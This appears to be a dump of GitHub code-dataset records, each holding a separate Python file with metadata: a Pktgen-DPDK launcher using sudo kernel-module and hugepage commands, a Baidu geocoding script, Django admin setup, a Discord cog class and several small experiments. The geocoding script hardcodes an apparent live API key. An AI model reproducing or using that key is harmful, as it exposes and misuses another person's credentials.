blob\n","repo_name":"ethz-asl/modular_semantic_segmentation","sub_path":"xview/datasets/synthia_cityscapes.py","file_name":"synthia_cityscapes.py","file_ext":"py","file_size_in_byte":9545,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"82"} +{"seq_id":"6703732362","text":"import sys\nimport os\nimport getopt\nimport subprocess\nimport glob\nimport types\nimport importlib.machinery\nimport importlib.util\nimport shutil\n\ndef usage():\n '''Print usage information for the program'''\n argv0 = os.path.basename(sys.argv[0])\n print(\"\"\"\nUsage:\n------\n %(argv0)s [options] [config_name]\n\n Where config_name is the one of the defined configuration files if no config\n file is listed then the ./default.cfg file will be used. If a cfg directory\n is located in the current directory then it will be searched for a match.\n\n The config_name is the name of the file without path and .cfg extension.\n\nOptions:\n--------\n -h, --help, -u, --usage:\n Display usage information and quit\n\n -l, --list:\n Print a list of known configuration files\n\n -n, --norun\n Just create the command line and outpuyt the line with no-running.\n\n -v, --verbose\n Print out more information\n\nExamples:\n---------\n To display current list of configuration files:\n %(argv0)s --list\n\n To run a config file:\n %(argv0)s default\n\n The configuration file name is always suffixed by .cfg as in default.cfg.\n The search location of the configuration files is .:./cfg\n\n \"\"\" % locals()) # replace items from local variables\n sys.exit(0)\n\ndef err_exit(str):\n ''' print the error string and exit '''\n print(str)\n sys.exit(1)\n\ndef find_file(fn, t):\n ''' Find the first file matching the arg value '''\n f = os.path.splitext(fn)\n if f[1] == t:\n fn = f[0]\n for f in file_list('cfg', t):\n b = os.path.basename(f)\n if os.path.splitext(b)[0] == fn:\n return f\n return None\n\ndef mk_tuple(lst, s):\n ''' Convert a string to a tuple if needed '''\n t = {}\n\n if type(lst[s]) != tuple:\n if verbose:\n print('Not a Tuple', type(lst[s]), lst[s])\n t[s] = tuple([lst[s],])\n else:\n if verbose:\n print('A tuple', type(lst[s]), lst[s])\n t[s] = lst[s]\n\n if verbose:\n print('New t[s]', type(t[s]), t[s])\n\n return t[s]\n\ndef add_ld_options(s, arg_list):\n ''' Append LD_LIBRARY_PATH option to arg list '''\n if s in cfg.run:\n str = 'LD_LIBRARY_PATH=.'\n for a in mk_tuple(cfg.run, s):\n _p = a % globals()\n str = str + ':' + _p\n arg_list.append(str)\n\ndef add_run_options(s, arg_list, p):\n ''' Append options to arg list '''\n if s in cfg.run:\n for a in mk_tuple(cfg.run, s):\n if p is not None:\n arg_list.append(p)\n\n _p = a % globals()\n arg_list.append(_p)\n\ndef add_setup_options(s, arg_list):\n ''' Append options to arg list '''\n if s in cfg.setup:\n for a in mk_tuple(cfg.setup, s):\n arg_list.extend(a.split(' '))\n\ndef file_list(directory, file_extension):\n ''' Return list of configuration files '''\n fileiter = (os.path.join(root, f)\n for root, _, files in os.walk(directory)\n for f in files)\n return (f for f in fileiter if os.path.splitext(f)[1] == file_extension)\n\ndef load_cfg(fname):\n ''' Load the configuration or .cfg file as a python data file '''\n\n if not os.path.exists(fname):\n err_exit(\"Config file %s does not exists\\n\" % fname)\n\n try:\n configuration_file = open(fname)\n except:\n err_exit(\"Error: unable to open file %s\\n\" % fname)\n\n global cfg\n loader = importlib.machinery.SourceFileLoader('cfg', fname)\n spec = 
importlib.util.spec_from_loader(loader.name, loader)\n    cfg = importlib.util.module_from_spec(spec)\n    loader.exec_module(cfg)\n    print(cfg)\n\n    configuration_file.close()\n    shutil.rmtree('cfg/__pycache__')\n\n    return cfg\n\ndef show_configs():\n    ''' Show configuration files '''\n\n    print(\"Configurations:\")\n    print(\" %-16s - %s\" % (\"Name\", \"Description\"))\n    print(\" %-16s %s\" % (\"----\", \"-----------\"))\n\n    for fname in file_list('cfg', '.cfg'):\n        base = os.path.splitext(os.path.basename(fname))[0]\n\n        try:\n            cfg = load_cfg(fname)\n\n            if not cfg.description:\n                cfg.description = \"\"\n            print(\" %-16s - %s\" % (base, cfg.description))\n        except NameError:\n            sys.stderr.write(\"We were unable to load the module \" + fname + \\\n                \" If you do not plan to use this module you can safely ignore this \" \\\n                \"message.\\n\")\n        finally:\n            # reset the description to empty, for next loop/file\n            cfg.description = \"\"\n\n    sys.exit(0)\n\ndef run_cfg(cfg_file):\n    ''' Run the configuration in the .cfg file '''\n\n    cfg = load_cfg(cfg_file)\n\n    args = []\n\n    add_run_options('exec', args, None)\n\n    add_ld_options('ld_path', args)\n\n    if not 'app_path' in cfg.run:\n        err_exit(\"'app_path' variable is missing from cfg.run in config file\")\n\n    if not 'app_name' in cfg.run:\n        err_exit(\"'app_name' variable is missing from cfg.run in config file\")\n\n    # convert the cfg.run['app_name'] into a global variable used in\n    # the creation of the application/path. app_name must be a global variable.\n    global app_name\n    app_name = cfg.run['app_name']\n\n    # Try all of the different path versions till we find one.\n    fname = None\n    for app in cfg.run['app_path']:\n        fn = app % globals()\n        print(\" Trying %s\" % fn)\n        if os.path.exists(fn):\n            fname = fn\n            if verbose:\n                print(\"Found %s\" % fn)\n            break\n\n    if not fname:\n        err_exit(\"Error: Unable to locate application %s\" % cfg.run['app_name'])\n\n    args.extend([fname])\n\n    add_run_options('cores', args, '-l')\n    add_run_options('nrank', args, '-n')\n    add_run_options('proc', args, '--proc-type')\n    add_run_options('log', args, '--log-level')\n    add_run_options('prefix', args, '--file-prefix')\n    add_run_options('shared', args, '-d')\n    add_run_options('blocklist', args, '-b')\n    add_run_options('allowlist', args, '-a')\n    add_run_options('vdev', args, '--vdev')\n    add_run_options('plugin', args, '-d')\n    args.extend([\"--\"])\n    add_run_options('opts', args, None)\n    add_run_options('map', args, '-m')\n    add_run_options('pcap', args, '-s')\n    add_run_options('theme', args, '-f')\n    add_run_options('loadfile', args, '-f')\n    add_run_options('logfile', args, '-l')\n\n    # Convert the args list to a single string with spaces.\n    str = \"\"\n    for a in args:\n        str = str + \"%s \" % a\n\n    # Output the command line\n    print(str)\n    if norun:\n        return\n\n    if verbose:\n        print(\"Command line:\")\n        print(args)\n\n    subprocess.call(args)\n\n    subprocess.call(['stty', 'sane'])\n\ndef num_sockets(hpath):\n    ''' Count the number of sockets in the system '''\n\n    sockets = 0\n    for i in range(0, 8):\n        if os.path.exists(hpath % i):\n            sockets = sockets + 1\n\n    return sockets\n\ndef setup_cfg(cfg_file):\n    ''' Setup the system by adding modules and ports to dpdk control '''\n\n    cfg = load_cfg(cfg_file)\n\n    print(\"Setup DPDK to run '%s' application from %s file\" %\n          (cfg.run['app_name'], cfg_file))\n\n    sys_node = '/sys/devices/system/node/node%d/hugepages'\n    hugepage_path = sys_node + '/hugepages-2048kB/nr_hugepages'\n\n    # calculate the number of sockets in the system.\n    nb_sockets = 
int(num_sockets(hugepage_path))\n    if nb_sockets == 0:\n        nb_sockets = 1\n\n    p = subprocess.Popen(['sysctl', '-n', 'vm.nr_hugepages'],\n                         stdout=subprocess.PIPE)\n\n    # split the number of hugepages between the sockets (integer division, Python 3)\n    nb_hugepages = int(p.communicate()[0]) // nb_sockets\n\n    if verbose:\n        print(\" Hugepages per socket %d\" % nb_hugepages)\n\n    if verbose:\n        print(\" modprobe the 'uio' required module\")\n\n    if 'uio' in cfg.setup:\n        u = cfg.setup['uio']\n\n        if u == 'igb_uio':\n            subprocess.call(['sudo', 'modprobe', \"uio\"])\n\n            if verbose:\n                print(\" Remove %s if already installed\" % u)\n\n            ret = subprocess.call(['sudo', 'rmmod', u])\n            if ret > 0:\n                print(\" Remove of %s, displayed an error ignore it\" % u)\n\n            uio = (\"%s/%s/kmod/%s.ko\" % (sdk, target, u))\n            if verbose:\n                print(\" insmod the %s module\" % uio)\n            subprocess.call(['sudo', 'insmod', uio])\n\n        if u == 'vfio-pci':\n            ret = subprocess.call(['sudo', 'rmmod', u])\n            if ret > 0:\n                print(\" Remove of %s, displayed an error ignore it\" % u)\n\n            if verbose:\n                print(\" modprobe the %s module\" % u)\n            subprocess.call(['sudo', 'modprobe', u])\n\n        if u == 'uio_pci_generic':\n            ret = subprocess.call(['sudo', 'rmmod', u])\n            if ret > 0:\n                print(\" Remove of %s, displayed an error ignore it\" % u)\n\n            if verbose:\n                print(\" insmod the %s module\" % u)\n            subprocess.call(['sudo', 'modprobe', u])\n    else:\n        if u == 'vfio-pci':\n            ret = subprocess.call(['sudo', 'rmmod', u])\n            if ret > 0:\n                print(\" Remove of %s, displayed an error ignore it\" % u)\n\n            if verbose:\n                print(\" modprobe the %s module\" % u)\n            subprocess.call(['sudo', 'modprobe', u])\n\n    for i in range(0, nb_sockets):\n        fn = (hugepage_path % i)\n        if verbose:\n            print(\" Set %d socket to %d hugepages\" % (i, nb_hugepages))\n        subprocess.call(['sudo', '-E', 'sh', '-c', 'eval',\n                         'echo %s > %s' % (nb_hugepages, fn)])\n\n    # locate the binding tool\n    if os.path.exists(\"/usr/local/bin/dpdk-devbind.py\"):\n        script = \"/usr/local/bin/dpdk-devbind.py\"\n    else:\n        if os.path.exists(\"%s/bin/dpdk-devbind.py\" % sdk):\n            script = \"%s/bin/dpdk-devbind.py\" % sdk\n        else:\n            if os.path.exists(\"%s/usertools/dpdk-devbind.py\" % sdk):\n                script = \"%s/usertools/dpdk-devbind.py\" % sdk\n            else:\n                err_exit(\"Error: Failed to find dpdk-devbind.py or dpdk_nic_bind.py\")\n\n    # build up the system command line to be executed\n    args = []\n    add_setup_options('exec', args)\n\n    args.extend([script])\n\n    args.append('-b')\n    args.append(cfg.setup['uio'])\n\n    add_setup_options('devices', args)\n\n    if verbose:\n        print(\" Bind following devices to DPDK:\")\n        for a in cfg.setup['devices']:\n            print(\" %s\" % a)\n        print(args)\n\n    subprocess.call(args)\n\ndef parse_args():\n    ''' Parse the command arguments '''\n\n    global run_flag, verbose, norun\n\n    run_flag = True\n    verbose = False\n    norun = False\n\n    cfg_file = \"./cfg/default.cfg\"\n\n    if len(sys.argv) <= 1:\n        print(\"*** Pick one of the following config files\\n\")\n        show_configs()\n\n    try:\n        opts, args = getopt.getopt(sys.argv[1:], \"hulsvn\",\n                                   [\"help\", \"usage\", \"list\", \"setup\", \"verbose\", \"norun\", ])\n\n    except getopt.GetoptError as error:\n        print(str(error))\n        usage()\n\n    for opt, _ in opts:\n        if opt == \"--help\" or opt == \"-h\":\n            usage()\n        if opt == \"--usage\" or opt == \"-u\":\n            usage()\n        if opt == \"--list\" or opt == \"-l\":\n            show_configs()\n        if opt == \"--setup\" or opt == \"-s\":\n            run_flag = False\n        if opt == \"--verbose\" or opt == \"-v\":\n            verbose = True\n        if opt == \"--norun\" or opt == \"-n\":\n            norun = True\n\n    if not args or len(args) > 1:\n        
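# exactly one config name must be supplied on the command line\n        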
usage()\n\n    fn = find_file(args[0], '.cfg')\n    if not fn:\n        f = args[0]\n        if os.path.splitext(args[0])[1] != '.cfg':\n            f = args[0] + '.cfg'\n        print(\"*** Config file '%s' not found\" % f)\n        print(\" Make sure you are running this command in pktgen top directory\")\n        print(\" e.g. cd Pktgen-DPDK; ./tools/run.py default\")\n        show_configs()\n    else:\n        cfg_file = fn\n\n    return cfg_file\n\ndef main():\n    '''program main function'''\n\n    global sdk, target\n\n    sdk = os.getenv(\"RTE_SDK\")\n\n    target = os.getenv(\"RTE_TARGET\")\n\n    print(\">>> sdk '%s', target '%s'\" % (sdk, target))\n\n    cfg_file = parse_args()\n\n    if run_flag:\n        run_cfg(cfg_file)\n    else:\n        setup_cfg(cfg_file)\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"pktgen/Pktgen-DPDK","sub_path":"tools/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":14055,"program_lang":"python","lang":"en","doc_type":"code","stars":303,"dataset":"github-code","pt":"82"} +{"seq_id":"1448895287","text":"from __future__ import (\n    annotations,\n)\n\nimport itertools as it\nimport logging\nfrom random import (\n    Random,\n)\nfrom typing import (\n    TYPE_CHECKING,\n)\n\nfrom cached_property import (\n    cached_property,\n)\n\nfrom .abc import (\n    InsertionIterator,\n)\n\nif TYPE_CHECKING:\n    from typing import Iterator\n    from .....models import (\n        Route,\n        Trip,\n    )\n\nlogger = logging.getLogger(__name__)\n\n\nclass StatelessInsertionIterator(InsertionIterator):\n    @cached_property\n    def iterator(self) -> Iterator[Route]:\n        for route, trip in it.product(self._attractive_routes, self.pending_trips):\n            logger.debug(f\"Yielding ({route}, {trip})...\")\n            yield from self._strategy.compute(route, trip)\n\n    def __next__(self) -> Route:\n        return next(self.iterator)\n\n    def _mark_trip_as_done(self, trip: Trip):\n        super()._mark_trip_as_done(trip)\n        self.flush()\n\n    def flush(self):\n        for key in (\"iterator\",):\n            self.__dict__.pop(key, None)\n\n\nclass BestStatelessInsertionIterator(StatelessInsertionIterator):\n    def __init__(self, randomized_size: int = 1, seed: int = 56, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.randomized_size = randomized_size\n        self.random = Random(seed)\n\n    def __next__(self) -> Route:\n        candidates = self._criterion.nbest(self.randomized_size, *self.iterator)\n\n        if not any(candidates):\n            raise StopIteration\n\n        best = self.random.choice(candidates)\n        return best\n","repo_name":"garciparedes/jinete","sub_path":"jinete/algorithms/heuristics/insertion/iterators/stateless.py","file_name":"stateless.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"82"} +{"seq_id":"39432254885","text":"import json\nimport xlrd\nimport xlwt\nimport numpy as np\nfrom urllib.request import urlopen, quote\n\n# Save the data to an Excel workbook\ndef save(data, path='city_coordinate.xls'):\n    f = xlwt.Workbook() # create the workbook\n    sheet1 = f.add_sheet(u'sheet1', cell_overwrite_ok=True) # create the sheet\n    [h, l] = data.shape # h is the number of rows, l the number of columns\n    for i in range(h):\n        for j in range(l):\n            sheet1.write(i, j, data[i, j])\n\n    f.save(path)\n\n# Extract city coordinates\ndef extract_city_coordinates(citylstfile='data_city.xlsx', ak='lxuvSE7TmLRquQPMmzhLsrEMjeOdy5CD '):\n    data = xlrd.open_workbook(citylstfile)\n    Sheet1 = data.sheet_by_name('Sheet1')\n    citys = Sheet1.col_values(1)\n    del citys[0] # drop the header row\n    print(citys)\n    \n    lst = ['City', 'Longitude', 'Latitude']\n    \n    # Example API URL format\n    # http://api.map.baidu.com/geocoder?address=地址&output=输出格式类型&key=用户密钥&city=城市名\n    # 
http://api.map.baidu.com/geocoding/v3/?address=北京市海淀区上地十街10号&output=json&ak=您的ak&callback=showLocation // GET request\n    url = 'http://api.map.baidu.com/geocoding/v3/'\n    output = 'json'\n    \n    for i in citys:\n        # Build the API request URL (rebuilt each iteration so parameters do not accumulate)\n        add = quote(i)\n        req_url = url + '?' + 'address=' + add + '&output=' + output + '&ak=' + ak # Baidu geocoding API\n        \n        # Read the JSON response\n        req = urlopen(req_url)\n        res = req.read().decode()\n        temp = json.loads(res)\n        \n        print(i, temp['result']['location']['lng'],temp['result']['location']['lat']) # longitude and latitude\n        \n        # longitude and latitude\n        coordinate = i, temp['result']['location']['lng'], temp['result']['location']['lat']\n        coordinate = np.array(coordinate)\n        lst = np.row_stack((lst, coordinate))\n    return lst\n\n\n# Main function\ndef main():\n    lst = extract_city_coordinates('city_lst.xlsx', 'lxuvSE7TmLRquQPMmzhLsrEMjeOdy5CD ')\n    print(lst)\n    save(lst, 'city_coordinate.xls')\n\n# Run\nmain()","repo_name":"niuyishuai/COVID-19-data","sub_path":"data/城市坐标数据/city_location.py","file_name":"city_location.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"34934066477","text":"from django.contrib import admin\nfrom HR.models import Post,Entrepreneur_content,Student_content,QA\nfrom django.contrib.auth.models import User,Group,Permission\nfrom django.contrib.auth.admin import UserAdmin\n\n# class CustomUserAdmin(UserAdmin):\n#     list_display=('username',\n#                 'first_name',\n#                 'last_name',\n#                 'password',\n#                 'email',\n#                 'phone',\n#                 'addredd',\n#                 'groups',\n#                 'is_staff',\n#                 'is_active',\n#                 'last_login',\n#                 'date_joined')\n\n\n\nclass PostAdmin(admin.ModelAdmin):\n    list_display = ('postid',\n                    'entrepreneur',\n                    'jobtype',\n                    'title',\n                    'detail',\n                    'condition',\n                    'contact',\n                    'benefit',\n                    'min_salary',\n                    'post_date',\n                    'viewed',\n                    'like')\n\n\nclass Entrepreneur_contentAdmin(admin.ModelAdmin):\n    list_display = ('entrepreneur','introduction','address','phone')\n\n\nclass Student_contentAdmin(admin.ModelAdmin):\n    list_display = ('student','mis_id','resume')\n\n\nclass QAAdmin(admin.ModelAdmin):\n    list_display = ('qaid','student','entrepreneur','post','content','post_date')\n\nadmin.site.register(QA,QAAdmin)\nadmin.site.register(Student_content,Student_contentAdmin)\nadmin.site.register(Entrepreneur_content,Entrepreneur_contentAdmin)\nadmin.site.register(Post,PostAdmin)\n# admin.site.register(User,CustomUserAdmin)\n\n# ------------old line\n# class PostAdmin(admin.ModelAdmin):\n#     list_display = ('ArticleId',\n#                 'VendorId',\n#                 'AContent_title',\n#                 'Type',\n#                 'MinSalary',\n#                 'AContent_detail',\n#                 'Acontent_condition',\n#                 'AContent_benefit',\n#                 'AContent_contact',\n#                 'Views',\n#                 'Like',\n#                 'PostingTime')\n\n# class VendorAdmin(admin.ModelAdmin):\n#     list_display = ('VendorId','Name','Password','Email','Phone','Address')\n\n# class QAAdmin(admin.ModelAdmin):\n#     list_display = ('QAId','ArticleId','ClientId','VendorId','QContent','PostingTime')\n\n# class ClientAdmin(admin.ModelAdmin):\n#     list_display = ('ClientId','Name','Password','Email','Phone','Resume')\n\n\n# admin.site.register(Post,PostAdmin)\n# admin.site.register(Vendor,VendorAdmin)\n# admin.site.register(QA,QAAdmin)\n# admin.site.register(Client,ClientAdmin)\n","repo_name":"Charliesgithub20221030/mi_club_web","sub_path":"HR/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"19184127235","text":"from __future__ import annotations\n\nimport typing\nimport logging\nimport 
re\n\nimport discord\nfrom discord.ext import commands as _commands\n\nfrom .redis import RedisChannelHandler\n\nif typing.TYPE_CHECKING:\n from .custom_bot import Bot\n from .database import DatabaseWrapper\n\n\nBotT = typing.TypeVar(\"BotT\", bound=\"Bot\")\n\n\nclass Cog(_commands.Cog, typing.Generic[BotT]):\n \"\"\"\n A slightly modified cog class to allow for the ``cache_setup`` method and for the class' ``logger`` instance.\n\n Attributes:\n bot (Bot): The bot instance that the cog was added to.\n logger (logging.Logger): The logger that's assigned to the cog instance. This will be used\n for logging command calls, even if you choose not to use it yourself.\n qualified_name (str): The human-readable name for the cog.\n\n ::\n\n class MyCog(voxelbotutils.Cog): pass\n c = MyCog(bot)\n c.qualified_name # \"My Cog\"\n\n class APICommands(voxelbotutils.Cog): pass\n c = APICommands(bot)\n c.qualified_name # \"API Commands\"\n \"\"\"\n\n def __init__(self, bot: BotT, logger_name: typing.Optional[str] = None):\n \"\"\"\n Args:\n bot (Bot): The bot that should be added to the cog.\n \"\"\"\n\n self.bot = bot\n bot_logger: logging.Logger = getattr(bot, \"logger\", logging.getLogger(\"bot\"))\n if logger_name:\n self.logger = bot_logger.getChild(logger_name)\n else:\n self.logger = bot_logger.getChild(self.get_logger_name())\n\n # Add the cog instance to redis channel handlers\n for attr in dir(self):\n try:\n item = getattr(self, attr)\n except AttributeError:\n continue\n if isinstance(item, RedisChannelHandler):\n item.cog = self\n\n def get_logger_name(self, *prefixes, sep: str = '.') -> str:\n \"\"\"\n Gets the name of the class with any given prefixes, with sep as a seperator. You\n tend to not need this yourself, but it is instead called internally by the bot\n when generating the :attr:`logger` instance.\n \"\"\"\n\n return sep.join(['cog'] + list(prefixes) + [self.__cog_name__.replace(' ', '')])\n\n @property\n def qualified_name(self) -> str:\n \"\"\":meta private:\"\"\"\n\n return re.sub(\n r\"(?:[A-Z])(?:(?:[a-z0-9])+|[A-Z]+$|[A-Z]+(?=[A-Z]))?\", \"\\\\g<0> \",\n super().qualified_name.replace(' ', '')\n ).strip()\n\n async def cache_setup(self, database: DatabaseWrapper):\n \"\"\"\n A method that gets run when the bot's startup method is run -\n intended for setting up cached information in the bot object that aren't in the\n :attr:`voxelbotutils.Bot.guild_settings` or :attr:`voxelbotutils.Bot.user_settings`\n tables. 
This setup should *clear* your caches before setting them, as the :func:`voxelbotutils.Bot.startup`\n method may be called multiple times.\n \"\"\"\n\n pass\n","repo_name":"Voxel-Fox-Ltd/Novus","sub_path":"discord/ext/vbu/cogs/utils/custom_cog.py","file_name":"custom_cog.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"82"} +{"seq_id":"43723622738","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# File : core.classifiers.RCNLPTextClassifier.py\n# Description : Echo State Network for text classification.\n# Auteur : Nils Schaetti \n# Date : 01.02.2017 17:59:05\n# Lieu : Nyon, Suisse\n#\n# This file is part of the Reservoir Computing NLP Project.\n# The Reservoir Computing Memory Project is a set of free software:\n# you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Foobar is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# You should have received a copy of the GNU General Public License\n# along with Foobar. If not, see .\n#\n\nimport numpy as np\nimport torch.utils.data\nfrom torch.autograd import Variable\nimport echotorch.nn as etnn\nimport echotorch.utils\nfrom tools import argument_parsing, dataset, functions, features\nimport matplotlib.pyplot as plt\nimport nsNLP\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.pipeline import Pipeline\n\n####################################################\n# Main\n####################################################\n\n\n# Argument builder\nargs = nsNLP.tools.ArgumentBuilder(desc=u\"Argument test\")\n\n# Dataset arguments\nargs.add_argument(command=\"--k\", name=\"k\", type=int, help=\"K-Fold Cross Validation\", extended=False, default=10)\nargs.add_argument(command=\"--author\", name=\"author\", type=str, help=\"Author to test\", extended=False, default=None)\n\n# Experiment output parameters\nargs.add_argument(command=\"--name\", name=\"name\", type=str, help=\"Experiment's name\", extended=False, required=True)\nargs.add_argument(command=\"--description\", name=\"description\", type=str, help=\"Experiment's description\",\n extended=False, required=True)\nargs.add_argument(command=\"--output\", name=\"output\", type=str, help=\"Experiment's output directory\", required=True,\n extended=False)\nargs.add_argument(command=\"--verbose\", name=\"verbose\", type=int, help=\"Verbose level\", default=2, extended=False)\n\n# Parse arguments\nargs.parse()\n\n# Load from directory\nsfgram_dataset, sfgram_loader_train, sfgram_loader_test = dataset.load_dataset(args.author, '')\n\n# Experiment\nxp = nsNLP.tools.ResultManager\\\n(\n args.output,\n args.name,\n args.description,\n args.get_space(),\n 1,\n args.k,\n verbose=args.verbose\n)\n\n# Average\naverage_k_fold = np.array([])\n\n# Print authors\nxp.write(u\"Author : {}\".format(sfgram_dataset.author), log_level=0)\nxp.write(u\"Texts : {}\".format(len(sfgram_dataset.texts)), log_level=0)\n\n# For each batch\nfor k in range(10):\n # Choose fold\n xp.set_fold_state(k)\n sfgram_loader_train.dataset.set_fold(k)\n 
sfgram_loader_test.dataset.set_fold(k)\n\n # Choose the right transformer\n sfgram_dataset.transform = None\n\n # Prediction for each threshold\n truth_vector = np.zeros((len(sfgram_loader_test)), dtype=np.int32)\n prediction_vector = np.ones((len(sfgram_loader_test)), dtype=np.int32)\n\n # Get test data for this fold\n for i, data in enumerate(sfgram_loader_test):\n # Sample\n inputs, label = data\n\n # Present or not\n for j in label:\n if int(j) == 1:\n truth_vector[i] = 1\n # end if\n # end for\n # end for\n\n try:\n # F1 score\n tp_fp = float(np.sum(prediction_vector))\n tp_fn = float(np.sum(truth_vector))\n mask = prediction_vector == 1\n tp = float(np.sum(truth_vector[mask]))\n\n # Precision and recall\n precision = tp / tp_fp\n recall = tp / tp_fn\n\n # Compute F1\n f1_score = 2.0 * ((precision * recall) / (precision + recall))\n except ZeroDivisionError:\n f1_score = 0.0\n # end try\n\n # Print success rate\n xp.add_result(f1_score)\n# end for\n\nxp.save()","repo_name":"nschaetti/ESN-SF-JCDL","sub_path":"baseline_true.py","file_name":"baseline_true.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"3612820051","text":"#!/usr/bin/env python\n\nimport Queue\nimport StringIO\nimport threading\nimport time\n\nimport cv2\nimport pizco\n\nimport ionode.base\n\nhost = '127.0.0.1'\nport = 21022\n\nprint_timing = True\n\n\nclass CaptureThread(threading.Thread):\n def __init__(self, capture_id=-1):\n self.stop_event = threading.Event()\n self.capture_id = capture_id\n self.queue = Queue.Queue(maxsize=10)\n super(CaptureThread, self).__init__()\n\n def run(self):\n c = cv2.VideoCapture(self.capture_id)\n t0 = time.time()\n count = 0\n while not self.stop_event.is_set():\n r, f = c.read()\n t1 = time.time()\n if count % 10 == 0:\n print(\"FPS: %s\" % (1. 
/ (t1 - t0)))\n t0 = t1\n count += 1\n if r:\n if self.queue.full():\n self.queue.get()\n self.queue.put(f)\n print(\"Releasing capture\")\n del c\n\n def stop(self):\n print(\"CaptureThread.stop called\")\n self.stop_event.set()\n\n def get_frame(self, recent=False, wait=False):\n try:\n f = self.queue.get(wait)\n if not recent:\n return f\n while not self.queue.empty():\n f = self.queue.get(wait)\n except Queue.Empty:\n return None\n return f\n\n\nclass CameraNode(ionode.base.IONode):\n def __init__(self, cfg=None):\n super(CameraNode, self).__init__(cfg)\n self.new_image = pizco.Signal(nargs=1)\n self.state = 'disconnected'\n self.streaming = False\n self.cam = None\n\n def start_streaming(self):\n if self.streaming:\n return\n self.streaming = True\n self.grab()\n\n def stop_streaming(self):\n if not self.streaming:\n return\n self.streaming = False\n\n def connect(self):\n if self.cam is not None:\n return\n print(\"Connecting to camera\")\n self.cam = CaptureThread()\n self.cam.start()\n self.start_streaming()\n\n def disconnect(self):\n if self.cam is None:\n return\n print(\"Disconnecting from camera\")\n self.stop_streaming()\n self.cam.stop()\n self.cam.join()\n self.cam = None\n\n def connected(self):\n return self.cam is not None\n\n def grab(self, in_callback=False):\n if not self.connected():\n return\n if not in_callback:\n return self.loop.add_callback(self.grab, True)\n f = self.cam.get_frame(recent=True)\n if f is not None and self.streaming:\n # convert to string\n t0 = time.time()\n _, b = cv2.imencode(\".jpg\", f)\n t1 = time.time()\n e = b.tostring().encode('base64')\n t2 = time.time()\n self.new_image.emit(e)\n t3 = time.time()\n if print_timing:\n print(\"Timing:[total %s]\" % (t3 - t0))\n print(\"\\tjpeg : %s\" % (t1 - t0))\n print(\"\\tbase64 : %s\" % (t2 - t1))\n print(\"\\temit : %s\" % (t3 - t2))\n if self.streaming:\n self.loop.add_callback(self.grab, True)\n return\n\nif __name__ == '__main__':\n cfg = {}\n cfg['addr'] = (\n 'tcp://%s:%s' % (host, port))\n node = CameraNode(cfg)\n node.serve_forever()\n","repo_name":"braingram/ionode","sub_path":"examples/03/start_ionode.py","file_name":"start_ionode.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"74121938827","text":"def votar(ano):\n from datetime import date \n\n idade = date.today().year - ano\n if idade > 65:\n return(f'O voto para quem tem mais de {idade} anos não é obrigatório.')\n elif idade > 18:\n return(f'O voto para quem tem {idade} anos é obrigatório. ')\n else:\n return(f'O voto para quem tem mais de {idade} é proibido. ')\n\n\nprint(votar(int(input('Em que ano você nasceu? 
'))))\n","repo_name":"barreto-jpedro/Python-course-exercises","sub_path":"Mundo 03/Exercícios/Ex101.py","file_name":"Ex101.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"23043139280","text":"import os\nfrom copy import deepcopy\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom data import cdnet\nfrom video import bg_subtraction\nfrom evaluation import metrics\nfrom evaluation import animations\n\n\nOUT_VIDEO_PATH_BASE = os.path.join('week3', 'resources', 'prev')\nOUT_VIDEO_EXTENSION = 'gif' #['gif','mp4']\nOUT_VIDEO_CODEC = None #[None,'mp4v']\n\n\ndataset_train_idx = {'highway': (1050, 1200),\n 'fall': (1460, 1510),\n 'traffic': (950, 1000)}\n\ndataset_test_idx = {'highway': (1200, 1350),\n 'fall': (1510, 1560),\n 'traffic': (1000, 1050)}\n\n\ndef animate(test, model, f_results, beta, dataset, alpha_values, rho_values):\n\n best_rho, best_alpha = np.unravel_index(np.argmax(f_results),\n f_results.shape)\n\n pred = bg_subtraction.predict(test, model, alpha=alpha_values[best_alpha],\n rho=rho_values[best_rho])\n\n out_filename = 'adapt-' + dataset + '-alpha_' \\\n + str(alpha_values[best_alpha]) + '_rho_' \\\n + str(rho_values[best_rho])\n\n out_video_path_full = os.path.join(OUT_VIDEO_PATH_BASE, str(beta)) + '_'\n\n if out_filename is not None and OUT_VIDEO_EXTENSION is not None:\n print('>>>>Recording animation in ' + out_video_path_full +\n out_filename + '.' + OUT_VIDEO_EXTENSION + '...')\n\n animations.video_recorder(pred, out_video_path_full, out_filename,\n OUT_VIDEO_CODEC, OUT_VIDEO_EXTENSION)\n\n\ndef plot_grid_search(alpha_values, rho_values, f1_results, title=''):\n \"\"\"Plot F1-score for a grid search\"\"\"\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n\n # https://matplotlib.org/examples/mplot3d/surface3d_demo.html\n X, Y = 